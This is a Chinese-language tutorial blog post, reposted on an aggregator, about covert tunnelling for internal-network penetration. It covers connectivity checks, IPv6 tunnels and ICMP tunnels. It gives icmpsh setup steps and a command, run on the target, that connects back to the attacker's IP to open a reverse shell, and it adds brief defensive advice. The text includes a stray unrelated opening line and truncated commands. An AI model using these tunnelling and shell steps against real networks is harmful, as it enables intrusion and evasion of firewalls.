ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术
hidden:是否完全隱藏控制面板,還有很多設(shè)置參數(shù),比如也可以設(shè)置顯示面板,然后設(shè)置寬高WIDTH=“整數(shù)” 和 HIGH=“整數(shù)”。
1. 隱藏通信隧道基礎(chǔ)1.1隱藏通信隧道技術(shù)概述常用的隧道:網(wǎng)絡(luò)層:IPv6隧道,ICMP隧道,GRE隧道
傳輸層:TCP隧道,UDP隧道,常規(guī)端口轉(zhuǎn)發(fā)
應(yīng)用程:SSH隧道,HTTP隧道,HTTPS隧道,DNS隧道
1.2 判斷內(nèi)網(wǎng)的連通性綜合判斷各種協(xié)議(TCP,HTTP,DNS,ICMP)及端口通信的情況。常用的允許流量出的端口有 80,8080,443,53,110,123等。
內(nèi)網(wǎng)連通性判斷方法:
1,ICMP協(xié)議、
執(zhí)行命令 "ping “
netcat(nc)譽(yù)為瑞士軍刀,通過使用TCP或UDP協(xié)議的網(wǎng)絡(luò)連接讀寫數(shù)據(jù)
使用nc工具,執(zhí)行?nc
3,HTTP協(xié)議
curl是利用URL規(guī)則在命令行下工作的綜合傳輸工具,
支持文件下載和上傳 ,在windows系統(tǒng)中需要安裝
命令:curl
鏈接:https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ
提取碼:zyx1
dns連通性,常用命令 ?:nslookup和dig
nslookup是windows自帶 dns探測(cè)命令,在沒有指定vps-ip時(shí),nslookup會(huì)從系統(tǒng)網(wǎng)絡(luò)中的TCP/IP屬性中讀取DNS服務(wù)器的地址
輸入 nslookup 按回車鍵 輸入 help命令。dig是linux自帶的命令 輸入dig -h顯示幫助信息
dig命令使用詳解
2. 網(wǎng)絡(luò)層隧道技術(shù)
在網(wǎng)絡(luò)層中 ,兩個(gè)常用的的隧道協(xié)議是IPv6 和IMCP
2.1 IPv6隧道
用來代替現(xiàn)行的IPv4協(xié)議的一種新IP協(xié)議
防御IPv6隧道攻擊的方法
了解IPv6的具體漏洞,結(jié)合其他協(xié)議,通過防火墻和深度防御系統(tǒng)過濾IPv6通信,提高主機(jī)和應(yīng)用程序的安全性
2.2 ICMP隧道
ICMP隧道簡單,實(shí)用,是一個(gè)比較特殊的協(xié)議 常見的ICMP消息為ping命令的回復(fù),將TCP/UDP數(shù)據(jù)封裝到ICMP的ping數(shù)據(jù)據(jù)包中,穿過防火墻,實(shí)現(xiàn)不受限制的網(wǎng)絡(luò)訪問
** icmpsh**
使用簡單不需要管理員權(quán)限
使用git clone命令下載icmpsh 下載地址
安裝python的impacket類庫 ?以便對(duì)TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等協(xié)議進(jìn)行訪問,
安裝python-impacket
因?yàn)閕cmpsh工具會(huì)替代系統(tǒng)本身的ping命令的應(yīng)答程序,需要關(guān)閉本地系統(tǒng)的ICMP應(yīng)答(如果要恢復(fù)系統(tǒng)應(yīng)答,則設(shè)置為0),否則shell的運(yùn)行會(huì)不穩(wěn)定(表現(xiàn)為一直刷屏,無法進(jìn)入交互輸入)。
sysctl?-w?net.ipv4.icmp_echo_ignore_all=1輸入 ?./run.sh?并運(yùn)行,會(huì)提示出現(xiàn)輸入目標(biāo)的IP地址(目標(biāo)主機(jī)的公網(wǎng)IP地址)
在目標(biāo)主機(jī)上查看ip地址,輸入如下命令:
icmpsh.exe?-t?192.168.227.137(攻擊機(jī)ip)?-d?30?-s?128在目標(biāo)主機(jī)運(yùn)行以上命令,即可在VPS中看到 192.168.227.133得shell。
防御ICMP隧道攻擊的方法
網(wǎng)絡(luò)管理員會(huì)阻止ICMP通信進(jìn)入站點(diǎn),在出站方向 ?ICMP通信是被允許的,目前大多數(shù)的網(wǎng)絡(luò)和邊界設(shè)備不會(huì)過濾ICMP流量
使用ICMP隧道時(shí)會(huì)產(chǎn)生大量的ICMP數(shù)據(jù)包,可以通過wireshark進(jìn)行ICMP數(shù)據(jù)包分析,已檢測(cè)惡意ICMP流量
一如既往的學(xué)習(xí),一如既往的整理,一如即往的分享。感謝支持
【好書推薦】
2020hw系列文章整理(中秋快樂、國慶快樂、雙節(jié)快樂)
HW中如何檢測(cè)和阻止DNS隧道
ctf系列文章整理
日志安全系列-安全日志
【干貨】流量分析系列文章整理
【干貨】超全的 滲透測(cè)試系列文章整理
【干貨】持續(xù)性更新-內(nèi)網(wǎng)滲透測(cè)試系列文章
【干貨】android安全系列文章整理
掃描關(guān)注LemonSec
總結(jié)
以上是生活随笔為你收集整理的ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java用栈处理四则运算_Java 用栈
- 下一篇: 干货 | 带你理解对比学习损失函数的性质